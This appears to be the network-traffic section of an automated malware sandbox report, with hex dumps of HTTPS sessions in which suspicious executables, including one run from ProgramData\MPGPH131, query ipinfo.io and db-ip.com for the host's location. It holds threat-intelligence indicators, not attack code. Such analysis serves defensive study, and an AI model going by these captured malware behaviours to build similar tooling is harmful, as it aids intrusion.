                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC1255INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 fe fe fe 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 24 fd fd fd ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb f5 e7 ff 8f c6 7b ff 54 a9 36 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 7e be 67 ff dd ee d7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 ff ff ff 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd d3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c4 e1 b9 ff 5c ac 3e ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff
                                                                                                                                                                                                                                      Data Ascii: /${T6S4S4S4S4S4S4S4S4S4~g"\>S4S4S4S4S4S4S4S4S4S4S4
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC1255INData Raw: ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fa c8 aa ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                      Data Ascii: BBBBBBBBBBB}BBBBBBBBBBB}
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC1117INData Raw: ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 81 8a f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 0b fd fd fd d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b5 ba f7 ff 3e 4b eb ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 3f 4c eb ff ba bf f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 26 fd fd fd eb ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                      Data Ascii: 5C5C5C5C5C5C5C5C5C5C5C5C5C5C>K5C5C5C5C5C5C5C5C5C5C5C5C?L&


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.54976634.117.186.1924435596C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:29:25 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.549767104.26.5.154435596C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:25 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC471F14:8F6A_93878F2E:0050_6621C8F5_8C5CE11:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=40EZI3UxYuLiq8VL6%2Bes3Q%2BM%2B0dTqMTPs8i1QNBSN6UaMNLsSehMQfcWAPW9buJ6v%2BmHOoXAcvcN7VvvUYt2gADGV0Q7PnE8rY8MMscZ97Jq4qtvDGlGwl%2FrcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87691fa03f16ad6e-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                                                                                                                                                                                      2024-04-19 01:29:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.54977634.117.186.1924434012C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:30 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:29:30 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.54977734.117.186.1924433436C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:30 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.549780104.26.5.154434012C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC454677:A6C4_93878F2E:0050_6621C8FB_8C5CEC0:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43QWkFA%2F3Av16BFGdAX3o4zJ%2Br7piyKLQ4Gxj488FcJNpbLaCJCq6lVq21O8%2BqR24jPMMJsgAf0ksmz06Q4zifVi2tOT%2BtB2N2jhcsKZlKt7gQlTA1imUEk1PA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87691fc37bb66737-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      10192.168.2.549782104.26.5.154433436C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC471E7B:AE72_93878F2E:0050_6621C8FB_8C855AD:4F34
                                                                                                                                                                                                                                      x-iplb-instance: 59215
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BBfRY8SqAOTYOvaEvDvIiqVAgXOKIBXwzk64bfoyNN1uD6GUSCCTo%2Fab7iHZZbBGAHmICgCRFdPI1b6uns7ehItwpjbOEezlzD4JsMkP09qiCGhAohmqQHubSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87691fc40b5a53ee-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      11192.168.2.54978974.125.138.1014437292C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:32 UTC549OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                      Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2024-04-19 01:29:32 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      12192.168.2.54979174.125.138.1014437292C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:32 UTC1298OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 927
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
